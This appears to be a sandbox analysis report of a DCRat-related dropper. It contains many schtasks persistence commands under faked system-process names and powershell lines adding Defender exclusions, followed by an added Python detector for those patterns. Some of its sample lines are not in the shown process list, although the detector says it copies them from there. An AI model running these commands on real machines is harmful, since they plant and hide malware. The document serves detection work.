PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe

Uses Task Scheduler COM API

persistence
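The schtasks.exe command lines listed under Processes below show the pattern behind this signature: each dropped binary gets three tasks (a MINUTE-interval relaunch, an ONLOGON task with /rl HIGHEST, and a second interval task with /rl HIGHEST), the binaries carry Windows system-process names (csrss.exe, lsass.exe, smss.exe, services.exe, dllhost.exe, explorer.exe, sppsvc.exe, wscript.exe) but sit outside System32, and each one is paired with a powershell Add-MpPreference -ExclusionPath call. The Python detector below is an added example, not part of the sandbox report: it runs over a handful of those command lines copied from the Processes list plus one constructed benign task, and flags the name masquerading, the HIGHEST run level, the short relaunch interval, user-profile drop locations and the Defender exclusions. The system-process name list and the trusted-directory set are the example's own assumptions. The `/mo -1` lines are reported as out of range because schtasks documents 1-1439 for /sc MINUTE; this page does not record whether schtasks accepted them.

```python
"""Flag the persistence and Defender-tampering patterns in this report's
Processes list (schtasks /create with system-process names outside system
directories, /rl HIGHEST, short MINUTE intervals; Add-MpPreference
exclusions). Added example; not part of the sandbox report."""
import re

# Assumption: on a stock installation these names only run from the Windows
# system directories, so a task launching them elsewhere is masquerading
# (ATT&CK T1036.005). "system.exe" is listed because no such binary exists.
SYSTEM_PROCESS_NAMES = {
    "csrss.exe", "smss.exe", "lsass.exe", "services.exe", "wininit.exe",
    "winlogon.exe", "svchost.exe", "dllhost.exe", "conhost.exe",
    "explorer.exe", "sppsvc.exe", "wscript.exe", "system.exe",
}
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}
# Exclusion roots that effectively switch off on-access scanning.
BROAD_ROOTS = ("$env:systemdrive", "$env:homedrive", "$env:systemroot", "$env:userprofile")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_EXCL = re.compile(r'-Exclusion(Path|Extension|Process)\s+(.*?)(?=\s+-\w+|"?\s*$)', re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_schtasks(cmdline):
    """Return the /option -> value map of a schtasks /create command, else None."""
    toks = tokenize(cmdline)
    start = next((i for i, t in enumerate(toks)
                  if re.fullmatch(r"schtasks(\.exe)?", t, re.I)), None)
    if start is None:
        return None
    opts, i = {}, start + 1
    while i < len(toks) and toks[i] != "&":        # "& exit" closes a cmd /c wrapper
        if toks[i].startswith("/"):
            nxt = toks[i + 1] if i + 1 < len(toks) else ""
            has_val = bool(nxt) and not nxt.startswith("/") and nxt != "&"
            opts[toks[i][1:].lower()] = nxt if has_val else ""
            i += 2 if has_val else 1
        else:
            i += 1
    return opts if "create" in opts else None


def assess_task(opts):
    """Reasons a schtasks /create command looks like malware persistence."""
    target = opts.get("tr", "").strip("'")          # the report quotes /tr as "'path'"
    low = target.lower()
    directory, _, base = low.rpartition("\\")
    reasons = []
    if base in SYSTEM_PROCESS_NAMES and directory not in TRUSTED_DIRS:
        reasons.append(f"{base} launched from non-system directory {directory}")
    if "\\users\\" in low or "\\programdata\\" in low:
        reasons.append("task binary lives in a user-writable profile path")
    if opts.get("rl", "").lower() == "highest":
        reasons.append("requests highest run level (/rl HIGHEST)")
    if opts.get("sc", "").lower() == "minute":
        mo = opts.get("mo", "1")                    # schtasks default for /sc MINUTE
        n = int(mo) if re.fullmatch(r"\d+", mo) else -1
        if not 1 <= n <= 1439:
            reasons.append(f"out-of-range /mo {mo} (valid 1-1439 for /sc MINUTE)")
        elif n <= 15:
            reasons.append(f"re-launches every {n} minute(s) (watchdog-style)")
    return reasons


def assess_defender(cmdline):
    """Reasons an Add-MpPreference command line weakens Defender."""
    if "add-mppreference" not in cmdline.lower():
        return []
    reasons = []
    for kind, value in _EXCL.findall(cmdline):
        v = value.lower()
        if kind.lower() == "extension" and re.search(r"\b(exe|dll)\b", v):
            reasons.append(f"extension exclusion {value}: executables no longer scanned")
        elif any(root in v for root in BROAD_ROOTS):
            reasons.append(f"path exclusion spans whole volume/profile: {value}")
        else:
            reasons.append(f"{kind} exclusion added for {value}")
    return reasons


def analyze(cmdlines):
    """Run both detectors over process command lines; return the findings."""
    findings = []
    for line in cmdlines:
        opts = parse_schtasks(line)
        if opts is not None:
            reasons = assess_task(opts)
            if reasons:
                findings.append({"kind": "schtasks", "name": opts.get("tn", ""),
                                 "target": opts.get("tr", "").strip("'"), "reasons": reasons})
            continue
        reasons = assess_defender(line)
        if reasons:
            findings.append({"kind": "defender", "name": "", "target": line, "reasons": reasons})
    return findings


# Command lines copied from the Processes list of this report, plus one
# constructed benign task (the last entry) that must produce no finding.
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /f''',
    r'''"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit''',
    '"powershell" -Command Add-MpPreference -ExclusionPath ' r"'C:\Windows\twain_32\sppsvc.exe'",
    'powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"',
    '''powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"''',
    r'schtasks /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe"',
]
```

Feed `analyze()` the CommandLine field of Sysmon Event ID 1 or Security 4688 events to run the same checks on endpoint telemetry; the cmd /c and "& exit" wrappers seen in this report are handled by the tokenizer, so no pre-cleaning is needed.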

Processes

C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\winNet\Bloxstrap.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 7 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Music\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 12 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\CRMLog\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\ja-JP\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\sppsvc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\Windows\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'

C:\Windows\twain_32\sppsvc.exe

"C:\Windows\twain_32\sppsvc.exe"

C:\Windows\SysWOW64\msiexec.exe

